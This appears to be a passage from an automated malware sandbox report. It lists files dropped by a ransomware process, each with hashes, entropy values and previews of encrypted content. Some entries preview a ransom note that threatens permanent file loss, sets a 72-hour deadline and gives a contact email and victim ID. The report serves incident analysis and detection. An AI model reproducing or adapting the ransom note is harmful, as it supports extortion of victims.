                                                                                            Entropy (8bit):7.859444500269546
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:K216kI6u0QsBfUUDJk352lr2+Y8nMLLnJyN+ri0j9RQ/kekNKccytU1eE:vIh6Fk352+8i0+rvmOKrWUx
                                                                                            MD5:34326468B30909292B02BA2EC8E13C53
                                                                                            SHA1:F639B00937F21599A82EC07418053FFEEA44506B
                                                                                            SHA-256:33C361D20D0546EB4173792424F661DFB9300430E3B8E2BB6E13E27A2AE5A25D
                                                                                            SHA-512:DDFA3C4BE5BA356B6848FA1E068C7F80E616CB2590A5267C278AD2AC8F6C7DB708167CCFA87AB42A9D49D2627F6A12371E2ED1F09EED2BA395BE8A866CC92431
                                                                                            Malicious:false
                                                                                            Preview:p.q.v*.C..u...J'K.'....i.....'..{.....B.K.o.....d...nr.~.= ....q....6..B.'.X..p.#2T..z.W..&g.;".%V.4Q...mW..r.4...,....k...F.2o..fI...Jhc...I..........Y.7.(`b.i;.~.:..$........0v.@.7.9.....|...H.{}`.. ...a...6.U..q,L.aCi...<a.1"_..."`G..a..GX..-P..R..0p....$K.T.f......=.F...CT.U:..IW..._.>.ED.*.~.7~%....=0..........~.c..I#..K.M.(..H.KM.n..@.Y..<1...,......k..?$x$S.p.C|).y.W........:...."....dvs.=.W.A.^...n.E1......<....1.R....zn......Gdd........5.\g..d...u..n..W."`..V...x.}+.X{.n........Y.......`....V0.....yj./....p..}l.8Uw..c../h..8@.._.....Q.P.*uG)...y-.........7X..;..YT.JR.........|d....W.H..w..6&1hz.NMCryo.5F.A.....U.P.....q8.....e./6...B..?B.0...u0...woU~.....\.G...b$?^<...t...=.......&0.tN.xK..s.........!l=`B.O.k.j...z.9.......#.w.K0L_.@.pJUZ.t..*xY..5..ii.#.3E.......6.........k ..f...._.......>r.g*.ec...HI.....A.z.h....|.db......U1.A0C.Z.C......W.0u...... ..d@.bYo1....%.....J...id...q.48.w....S.z=..vsY..nd..6.)}Qw..y."...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.859444500269546
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:K216kI6u0QsBfUUDJk352lr2+Y8nMLLnJyN+ri0j9RQ/kekNKccytU1eE:vIh6Fk352+8i0+rvmOKrWUx
                                                                                            MD5:34326468B30909292B02BA2EC8E13C53
                                                                                            SHA1:F639B00937F21599A82EC07418053FFEEA44506B
                                                                                            SHA-256:33C361D20D0546EB4173792424F661DFB9300430E3B8E2BB6E13E27A2AE5A25D
                                                                                            SHA-512:DDFA3C4BE5BA356B6848FA1E068C7F80E616CB2590A5267C278AD2AC8F6C7DB708167CCFA87AB42A9D49D2627F6A12371E2ED1F09EED2BA395BE8A866CC92431
                                                                                            Malicious:false
                                                                                            Preview:p.q.v*.C..u...J'K.'....i.....'..{.....B.K.o.....d...nr.~.= ....q....6..B.'.X..p.#2T..z.W..&g.;".%V.4Q...mW..r.4...,....k...F.2o..fI...Jhc...I..........Y.7.(`b.i;.~.:..$........0v.@.7.9.....|...H.{}`.. ...a...6.U..q,L.aCi...<a.1"_..."`G..a..GX..-P..R..0p....$K.T.f......=.F...CT.U:..IW..._.>.ED.*.~.7~%....=0..........~.c..I#..K.M.(..H.KM.n..@.Y..<1...,......k..?$x$S.p.C|).y.W........:...."....dvs.=.W.A.^...n.E1......<....1.R....zn......Gdd........5.\g..d...u..n..W."`..V...x.}+.X{.n........Y.......`....V0.....yj./....p..}l.8Uw..c../h..8@.._.....Q.P.*uG)...y-.........7X..;..YT.JR.........|d....W.H..w..6&1hz.NMCryo.5F.A.....U.P.....q8.....e./6...B..?B.0...u0...woU~.....\.G...b$?^<...t...=.......&0.tN.xK..s.........!l=`B.O.k.j...z.9.......#.w.K0L_.@.pJUZ.t..*xY..5..ii.#.3E.......6.........k ..f...._.......>r.g*.ec...HI.....A.z.h....|.db......U1.A0C.Z.C......W.0u...... ..d@.bYo1....%.....J...id...q.48.w....S.z=..vsY..nd..6.)}Qw..y."...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.841805536405913
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:7ziLXseP0BqSU93OOigmK3jfLgK6mQDilm:viYu0Bj4OfRGvgKfoilm
                                                                                            MD5:6F99DF46F0EF12958D2422C6284C06F2
                                                                                            SHA1:F4A115A0ACEAA3B28C84A920D802B2BE3E76AE70
                                                                                            SHA-256:7E877E4E9632EADB0C0B15AB32E28EE1116B0BEA819D2DB0632AA77AA25F7800
                                                                                            SHA-512:EE98C9CA09A9ECEC873479A3D73D98A0A1AF5118A9D553839C39DC81BDC0735060855BEEED54390078A47285449B11D556143B64D566F5F4C97521BA24CBE950
                                                                                            Malicious:false
                                                                                            Preview:<.M(....%1&.Z.$O".Y..EZ.W(.[\.r..$J.t..M.;.V..%....G.t....YA..22....=......_].y........G.Y1.....9.......:..V...oF.....9..."5.8K.TI...8....5R.......:......m?......D......6u.:.I....G...(.`W$.y...T.....:.V.\.....G..O.].ki2.|....../..?iC...`.S~...M8rd.Ion+.b.........)'B.......OI.^.........4.z....e._._.K\.u.....Eu..`|.../P?'9.........P...;.tAK.r=.Z.........}......(.......?...qX.c.(....Z.5..cc[6..9.....-cK...j,..1.....U..P../.q87..]..y....x2W...:x...9..b...Q.....O1....1....S5A4?|.D&......W.;..6.....O...qb.u..D..Y.!..p.{...f..f>..'.+..J.V..:..c.L.....A;...n...b.U5..r..o..........Z\n.=...zD...L........$.8C.."../....).q..F@s..r .Xk.>.T.....w.Pp.z. Zr}k.z.y..o..."...9,....m......;..{.fs.<......<.A..j...K>...... ..;|..[n..<z.n...F....(..62<+..Xf.~.8!...MFV6s....(..z......)+15]..].=..3.BEg-~9>^b.hF.L0... 6..^.I.uV*..".5f.....K..wG..F...&p.Z...(P.h....@.v..~.2.i&.W....l...EP.....:.{......N....{...@auY9.H.Y_&=....)*......UM.Al........5*..K .X&..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.841805536405913
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:7ziLXseP0BqSU93OOigmK3jfLgK6mQDilm:viYu0Bj4OfRGvgKfoilm
                                                                                            MD5:6F99DF46F0EF12958D2422C6284C06F2
                                                                                            SHA1:F4A115A0ACEAA3B28C84A920D802B2BE3E76AE70
                                                                                            SHA-256:7E877E4E9632EADB0C0B15AB32E28EE1116B0BEA819D2DB0632AA77AA25F7800
                                                                                            SHA-512:EE98C9CA09A9ECEC873479A3D73D98A0A1AF5118A9D553839C39DC81BDC0735060855BEEED54390078A47285449B11D556143B64D566F5F4C97521BA24CBE950
                                                                                            Malicious:false
                                                                                            Preview:<.M(....%1&.Z.$O".Y..EZ.W(.[\.r..$J.t..M.;.V..%....G.t....YA..22....=......_].y........G.Y1.....9.......:..V...oF.....9..."5.8K.TI...8....5R.......:......m?......D......6u.:.I....G...(.`W$.y...T.....:.V.\.....G..O.].ki2.|....../..?iC...`.S~...M8rd.Ion+.b.........)'B.......OI.^.........4.z....e._._.K\.u.....Eu..`|.../P?'9.........P...;.tAK.r=.Z.........}......(.......?...qX.c.(....Z.5..cc[6..9.....-cK...j,..1.....U..P../.q87..]..y....x2W...:x...9..b...Q.....O1....1....S5A4?|.D&......W.;..6.....O...qb.u..D..Y.!..p.{...f..f>..'.+..J.V..:..c.L.....A;...n...b.U5..r..o..........Z\n.=...zD...L........$.8C.."../....).q..F@s..r .Xk.>.T.....w.Pp.z. Zr}k.z.y..o..."...9,....m......;..{.fs.<......<.A..j...K>...... ..;|..[n..<z.n...F....(..62<+..Xf.~.8!...MFV6s....(..z......)+15]..].=..3.BEg-~9>^b.hF.L0... 6..^.I.uV*..".5f.....K..wG..F...&p.Z...(P.h....@.v..~.2.i&.W....l...EP.....:.{......N....{...@auY9.H.Y_&=....)*......UM.Al........5*..K .X&..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.861132541452089
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:dj5p1NPZlO7Zjq8OH919VoiSBedlLcttyoLF6vkaCRTJOHS8Ij7rO2+Hf:dhcFjbK7Ix4sTxSkaCRTJOy8q7yb
                                                                                            MD5:9DA1D9D5688896DEA5832AA4EADB90D4
                                                                                            SHA1:0E4BE615DCCA165A8451FF2C978FA02E4F163A78
                                                                                            SHA-256:5E55FF7A4035093842856D8AA14AA35102E7A78D5CA3921345060D672339D688
                                                                                            SHA-512:DDE6B16EB818C8FE454B49359B5815A8E45C9E3FA8A978459802830EDBA8EA8F61BF1B4C1232C86E695EBD877265973B927DEADE3613E1577C19DD1CF2094AA9
                                                                                            Malicious:false
                                                                                            Preview:/Sd..NY..`....^.L..0...].....g..pwD..5....*.hYm>9..c..wO.;......L..m.1..t.AC..1.b.|.l,.r....*"......&...MOX... ......|..(%5X.UD.X...0..~.....Eq.T.0.....?...K.@K.........:..;|.h.M%% ...50.w0(.a..@.0+..._...U[K...UD...D..!..x&....]._....d./.+....R...u..._P.baX.O.g.5.....Q...h<..6l.Ws..i}.|...........F.E.....a..cP...(63..2.OQFc)0..\..:?.....F.).N..?.TS....Eh._A.pP....yk%...~T..H...1...q.l.vWe..O.(..u..z- n.j8....E,..!.'..P5y.3......1.>...k......N...S.pO-u...........Zt.I*mjo......?lD'. .R.rx..D.....pV[...EP..q....s...7..:.A5.<J...6.t...~c.~4~....o.g<M...hGw.O.*.......>...D.|iU<o.[....>.....Ya......XvO...."..J..:...Oy...'.....M.4B..[1L}.g .c.U....ng...kD...?B......Tz.:.g....wo.H.i\.L.e...~Q.#.b'......_......T...$.o........jc..v..w.....H.......[U.r.x......Rb.....3X_.U..Bh...<..`.O..{..+*<>Y!...b.F..1.UY..]m0..IKow..m.K.g.T..h..7O.L.N.#w...G.1.3`.5n...H..a..6...?.u^.W.?@c.=.1..0j...\...u.9..y...b.~....Tv...."].........`.`m...$.^.B..D7^
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.861132541452089
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:dj5p1NPZlO7Zjq8OH919VoiSBedlLcttyoLF6vkaCRTJOHS8Ij7rO2+Hf:dhcFjbK7Ix4sTxSkaCRTJOy8q7yb
                                                                                            MD5:9DA1D9D5688896DEA5832AA4EADB90D4
                                                                                            SHA1:0E4BE615DCCA165A8451FF2C978FA02E4F163A78
                                                                                            SHA-256:5E55FF7A4035093842856D8AA14AA35102E7A78D5CA3921345060D672339D688
                                                                                            SHA-512:DDE6B16EB818C8FE454B49359B5815A8E45C9E3FA8A978459802830EDBA8EA8F61BF1B4C1232C86E695EBD877265973B927DEADE3613E1577C19DD1CF2094AA9
                                                                                            Malicious:false
                                                                                            Preview:/Sd..NY..`....^.L..0...].....g..pwD..5....*.hYm>9..c..wO.;......L..m.1..t.AC..1.b.|.l,.r....*"......&...MOX... ......|..(%5X.UD.X...0..~.....Eq.T.0.....?...K.@K.........:..;|.h.M%% ...50.w0(.a..@.0+..._...U[K...UD...D..!..x&....]._....d./.+....R...u..._P.baX.O.g.5.....Q...h<..6l.Ws..i}.|...........F.E.....a..cP...(63..2.OQFc)0..\..:?.....F.).N..?.TS....Eh._A.pP....yk%...~T..H...1...q.l.vWe..O.(..u..z- n.j8....E,..!.'..P5y.3......1.>...k......N...S.pO-u...........Zt.I*mjo......?lD'. .R.rx..D.....pV[...EP..q....s...7..:.A5.<J...6.t...~c.~4~....o.g<M...hGw.O.*.......>...D.|iU<o.[....>.....Ya......XvO...."..J..:...Oy...'.....M.4B..[1L}.g .c.U....ng...kD...?B......Tz.:.g....wo.H.i\.L.e...~Q.#.b'......_......T...$.o........jc..v..w.....H.......[U.r.x......Rb.....3X_.U..Bh...<..`.O..{..+*<>Y!...b.F..1.UY..]m0..IKow..m.K.g.T..h..7O.L.N.#w...G.1.3`.5n...H..a..6...?.u^.W.?@c.=.1..0j...\...u.9..y...b.~....Tv...."].........`.`m...$.^.B..D7^
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.8512298497624196
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:30r0EWUHA0TmUR/aAMcYQz6lJeDV5p38oIDeUIeIq9Vrv5P6Gbt7EBt:30LXlTxR/mc8l8DZ3pIiUa6VlVbt7ED
                                                                                            MD5:80ECFEE37C247D697D8B6322CA9FB649
                                                                                            SHA1:BD62C672C2CE1FD514CB9D1EF92BDF98E6036A21
                                                                                            SHA-256:793D3A6A2F651605D5EFB64EADA5C6B3AC988FDEB50D007CC27D67F2650E42E4
                                                                                            SHA-512:33F2D1DAC4988E7399D512B258CCD5DCF67658171478DC223A3DA23D6861F6294DB356BF11E813ECA54E149A82B89CCB5526D284976AA955E0B9BF0BCD61BA73
                                                                                            Malicious:false
                                                                                            Preview:'.YB..;.......v....G?..K..`#L..assh..6..O...7hh...=.@.i1...s..../,k.N>U.T..W..B..@b.....&......;?._.@_....Y..{$..<.j...6...z....".....G).Fr....-.5.B..{.u..X.ouc6.H:L.\.-h.."|...._r(@..a.e..:Z..".....[...pO.....u...R`.L........&:$.j.h=.P...vRm. ......EH#U.6 ..n._f...J.S..UZy:m.*.....u..P...z. ...}..%m.{s..6...e..j.4.a.:..JA..Y)kA.|..:.....1..'.e.k..#.....'..eI.......U.XX<&x..........- .F.7....@lB.[..rk...d.o...Y..."5@f.....aG~c;~...?..s..3|......;{.o8......|.o .9,....a....0.kP>..X....N6s[..j...t..L........?Qp...Xo#wnK.......X..4n. 5.5]...:...&.JTVI.5.+.......s.. IQ....x..].....p*~..........H....=...ac.m.....WXk...d.9u...85.h...F.O....EX...=.>...d.Xv..g;5.A..B../`.:V?...pF`.?.9.H..g..Z.n...l.q.....a}..r[.......hU..Y...Q.|m&...C..M.~....2W-..Y...oc...5. .9..U.....c...p.1...c]..".U...]x ...Brsm.ZcEQ#^C'....#...Y<+f;.B..-.5....<...q^+y..2........J...x.P.e{.[.H.8..g*.sU"...\.Z.<..|O...E...U.;.i......0..<MC..Ep.I..-Vy\.X..K1^...e.*.....Md..../)..JJ
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.8512298497624196
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:30r0EWUHA0TmUR/aAMcYQz6lJeDV5p38oIDeUIeIq9Vrv5P6Gbt7EBt:30LXlTxR/mc8l8DZ3pIiUa6VlVbt7ED
                                                                                            MD5:80ECFEE37C247D697D8B6322CA9FB649
                                                                                            SHA1:BD62C672C2CE1FD514CB9D1EF92BDF98E6036A21
                                                                                            SHA-256:793D3A6A2F651605D5EFB64EADA5C6B3AC988FDEB50D007CC27D67F2650E42E4
                                                                                            SHA-512:33F2D1DAC4988E7399D512B258CCD5DCF67658171478DC223A3DA23D6861F6294DB356BF11E813ECA54E149A82B89CCB5526D284976AA955E0B9BF0BCD61BA73
                                                                                            Malicious:false
                                                                                            Preview:'.YB..;.......v....G?..K..`#L..assh..6..O...7hh...=.@.i1...s..../,k.N>U.T..W..B..@b.....&......;?._.@_....Y..{$..<.j...6...z....".....G).Fr....-.5.B..{.u..X.ouc6.H:L.\.-h.."|...._r(@..a.e..:Z..".....[...pO.....u...R`.L........&:$.j.h=.P...vRm. ......EH#U.6 ..n._f...J.S..UZy:m.*.....u..P...z. ...}..%m.{s..6...e..j.4.a.:..JA..Y)kA.|..:.....1..'.e.k..#.....'..eI.......U.XX<&x..........- .F.7....@lB.[..rk...d.o...Y..."5@f.....aG~c;~...?..s..3|......;{.o8......|.o .9,....a....0.kP>..X....N6s[..j...t..L........?Qp...Xo#wnK.......X..4n. 5.5]...:...&.JTVI.5.+.......s.. IQ....x..].....p*~..........H....=...ac.m.....WXk...d.9u...85.h...F.O....EX...=.>...d.Xv..g;5.A..B../`.:V?...pF`.?.9.H..g..Z.n...l.q.....a}..r[.......hU..Y...Q.|m&...C..M.~....2W-..Y...oc...5. .9..U.....c...p.1...c]..".U...]x ...Brsm.ZcEQ#^C'....#...Y<+f;.B..-.5....<...q^+y..2........J...x.P.e{.[.H.8..g*.sU"...\.Z.<..|O...E...U.;.i......0..<MC..Ep.I..-Vy\.X..K1^...e.*.....Md..../)..JJ
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.837189232334288
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:2kZGGWxV/vRQj8sjiuwdAKahl/CN6W5Ipxm6XfxwZq9sbfE3yDrJk6m28N71:jZfEVXqj8sjpwdAKGd8/uBuI9Uf2WmDl
                                                                                            MD5:E4B7C88E93E069508376822B55791BA3
                                                                                            SHA1:71A9976CEB0BAC4DDE6DE6F5CEDB4EF04ABC021C
                                                                                            SHA-256:B98A22BEFC7C3A6B41AB2C052EEB2FF4220C845C51D4144E82703DBBBA9AEC88
                                                                                            SHA-512:CA75FD54E1122D0966AACBEB12BFBD29FAF7B29B9BE263F952D7F7BC82891EEE4E12BA5C02AEBF96BACD632192E4EBAF9F925F31C72E13E7D0242C78480E0259
                                                                                            Malicious:false
                                                                                            Preview::z[....$w.....G6r!n...=`.].Lg..)q.ZC}........^.W..m.........?...7.......{.......Q!.5.A...t..M...dW.|/R.,...9.c.8/N.yC..(......k3.q".{U|`....$b..8..c>....]...y.|.V..d..kD;....y.YZS...B..-..\y2..2...w@..>'_.3...]!D1ax...U|...]....Los...V.....@...6....y5.w1..4..-|.!......F6.|.....H...:...>...".....m.<../Pe.,H..i...;......K....xRb.qe.....L7-.....bU%2...vN..g:AT.......Z.UYN+{TH...ZX.....ATee.*}.}.....K/.....,y..4lz5.=........u9~..Z.!p.....u..NT..w...}.....N..t..2...-.g1Fx.....W+.m.....Nou&\..FY.,s.:.k.y,.%_j....da4.b.y=.[..4.(.g..f..8.k..X{.K.1.UDFo...t..=...u.(....X.8.G.yJ.3.R.y.I..y$..S..<....F>.H.L.L....,..:.0Mz.@...*...6tGB.r]7s...N......Av{Xd..*........>.........p.y>&+..lI.U.Da..'.&.:).9w.t.y+..PZ.^.%.S.d.c...y_....M...TN...7.B7lI.-kG.....6.T.d.L........,M\8.$..`{X...g..bV8'...#............y..x....8)l....4BMa&`....[... ;.c.z_.....dX.FW...s.......7.....~nf..4O5.....w....T6.6...{j].8.u).*..i^bnMn1.U&.....5.../r.,.h..}N..Z...J..t...j..*[.l,.M.g.g....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.837189232334288
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:2kZGGWxV/vRQj8sjiuwdAKahl/CN6W5Ipxm6XfxwZq9sbfE3yDrJk6m28N71:jZfEVXqj8sjpwdAKGd8/uBuI9Uf2WmDl
                                                                                            MD5:E4B7C88E93E069508376822B55791BA3
                                                                                            SHA1:71A9976CEB0BAC4DDE6DE6F5CEDB4EF04ABC021C
                                                                                            SHA-256:B98A22BEFC7C3A6B41AB2C052EEB2FF4220C845C51D4144E82703DBBBA9AEC88
                                                                                            SHA-512:CA75FD54E1122D0966AACBEB12BFBD29FAF7B29B9BE263F952D7F7BC82891EEE4E12BA5C02AEBF96BACD632192E4EBAF9F925F31C72E13E7D0242C78480E0259
                                                                                            Malicious:false
                                                                                            Preview::z[....$w.....G6r!n...=`.].Lg..)q.ZC}........^.W..m.........?...7.......{.......Q!.5.A...t..M...dW.|/R.,...9.c.8/N.yC..(......k3.q".{U|`....$b..8..c>....]...y.|.V..d..kD;....y.YZS...B..-..\y2..2...w@..>'_.3...]!D1ax...U|...]....Los...V.....@...6....y5.w1..4..-|.!......F6.|.....H...:...>...".....m.<../Pe.,H..i...;......K....xRb.qe.....L7-.....bU%2...vN..g:AT.......Z.UYN+{TH...ZX.....ATee.*}.}.....K/.....,y..4lz5.=........u9~..Z.!p.....u..NT..w...}.....N..t..2...-.g1Fx.....W+.m.....Nou&\..FY.,s.:.k.y,.%_j....da4.b.y=.[..4.(.g..f..8.k..X{.K.1.UDFo...t..=...u.(....X.8.G.yJ.3.R.y.I..y$..S..<....F>.H.L.L....,..:.0Mz.@...*...6tGB.r]7s...N......Av{Xd..*........>.........p.y>&+..lI.U.Da..'.&.:).9w.t.y+..PZ.^.%.S.d.c...y_....M...TN...7.B7lI.-kG.....6.T.d.L........,M\8.$..`{X...g..bV8'...#............y..x....8)l....4BMa&`....[... ;.c.z_.....dX.FW...s.......7.....~nf..4O5.....w....T6.6...{j].8.u).*..i^bnMn1.U&.....5.../r.,.h..}N..Z...J..t...j..*[.l,.M.g.g....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.855525454981508
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:409Hftf6Y6cmn4uCzN2kKzw9asVa1UOV+tC/TqRsg6X2A0o2D:b5kY6cglLw91VodV+tCyo2D
                                                                                            MD5:9D05DF1FC683245A44740E3B0DE8D79E
                                                                                            SHA1:70A40DFEE4969064A6664E174CDF4E24F57DDF49
                                                                                            SHA-256:22F941C397B43C7B4E269A4ACF671BD649BEE27B3658B683E1E865B7C71F1D04
                                                                                            SHA-512:56670A790A9474CB92E20A5B6302C1F0ACA6F473CBB79D8EB02650193819DBCB1534799CBE2F421303C806B93D9E3F145BB9682B6F8D3DD133FB18F4085E328D
                                                                                            Malicious:false
                                                                                            Preview:>.^.>..o..e.._p]....N..f...v,...-.E.!..F`![r.R.F.b.`.].]..N..O....O.....8.._.M^.T.....M..^.j..o...0.Ree^..V.8..{f6'..U.....X....j{}l@n.e*.Ptt...".D...1.TV.=..B....$z.`2e..b.u..t...[RJA....W#g}.....'..~S=F.z....9.*d..d...P(nJ..-.....hez...6NM.=n.[.x.;..;.......P...!Q.I..."+..I7....;.h.....A..y.."...8...94..U...*~......~N.8......._.4.r.`.v...X.^Y+... l...F)..!...M.1=K.^tq..@#.....|....V..Vg.hn..2B..+K...x....n..".D...Qr%\...w.|.r.;.tc..a.,\`z.....H..C....[u!...q..@.AY}...$.L...D......+_....j.E.m.....g>..z..!@.Mi..j..]@..o.....09|.....B.|!.....s...B.A..tv..-gD......h#..ji....4H.l.FS.#.\.%Oc..O..{..&V.AAi{.#p`..i.m..7+..M..x\.,i.3|...Y....1`d...D6.!?.....1w....~]"..7.."...S..BW.w.6.0#.#}..%.....zE....D.{n.c.u.P...G..i.R.-P.X...W.R......'.e.....A...h.b....!.?.N^H.[2.D:+.r....s.Qna3..-r...|J.a5.....J...O\L;..N...y=.[......Q...<.u.^G.9.........%..+..v...F.(0.&.s..+(....\...`..(........)y.E.-....=d...9X....QH.....!.vd..B.A...i.v......o.....Sz..B*
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.855525454981508
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:409Hftf6Y6cmn4uCzN2kKzw9asVa1UOV+tC/TqRsg6X2A0o2D:b5kY6cglLw91VodV+tCyo2D
                                                                                            MD5:9D05DF1FC683245A44740E3B0DE8D79E
                                                                                            SHA1:70A40DFEE4969064A6664E174CDF4E24F57DDF49
                                                                                            SHA-256:22F941C397B43C7B4E269A4ACF671BD649BEE27B3658B683E1E865B7C71F1D04
                                                                                            SHA-512:56670A790A9474CB92E20A5B6302C1F0ACA6F473CBB79D8EB02650193819DBCB1534799CBE2F421303C806B93D9E3F145BB9682B6F8D3DD133FB18F4085E328D
                                                                                            Malicious:false
                                                                                            Preview:>.^.>..o..e.._p]....N..f...v,...-.E.!..F`![r.R.F.b.`.].]..N..O....O.....8.._.M^.T.....M..^.j..o...0.Ree^..V.8..{f6'..U.....X....j{}l@n.e*.Ptt...".D...1.TV.=..B....$z.`2e..b.u..t...[RJA....W#g}.....'..~S=F.z....9.*d..d...P(nJ..-.....hez...6NM.=n.[.x.;..;.......P...!Q.I..."+..I7....;.h.....A..y.."...8...94..U...*~......~N.8......._.4.r.`.v...X.^Y+... l...F)..!...M.1=K.^tq..@#.....|....V..Vg.hn..2B..+K...x....n..".D...Qr%\...w.|.r.;.tc..a.,\`z.....H..C....[u!...q..@.AY}...$.L...D......+_....j.E.m.....g>..z..!@.Mi..j..]@..o.....09|.....B.|!.....s...B.A..tv..-gD......h#..ji....4H.l.FS.#.\.%Oc..O..{..&V.AAi{.#p`..i.m..7+..M..x\.,i.3|...Y....1`d...D6.!?.....1w....~]"..7.."...S..BW.w.6.0#.#}..%.....zE....D.{n.c.u.P...G..i.R.-P.X...W.R......'.e.....A...h.b....!.?.N^H.[2.D:+.r....s.Qna3..-r...|J.a5.....J...O\L;..N...y=.[......Q...<.u.^G.9.........%..+..v...F.(0.&.s..+(....\...`..(........)y.E.-....=d...9X....QH.....!.vd..B.A...i.v......o.....Sz..B*
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.869218331888498
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:R6zAVdHIOevQrpbYgokUjIigwYX/k1d1571kBE3YS3b+BBycfEyTS5CmdSX0IHcH:R6zV3vCpbdqIz5XM1Th1k4vKzl8DDSkX
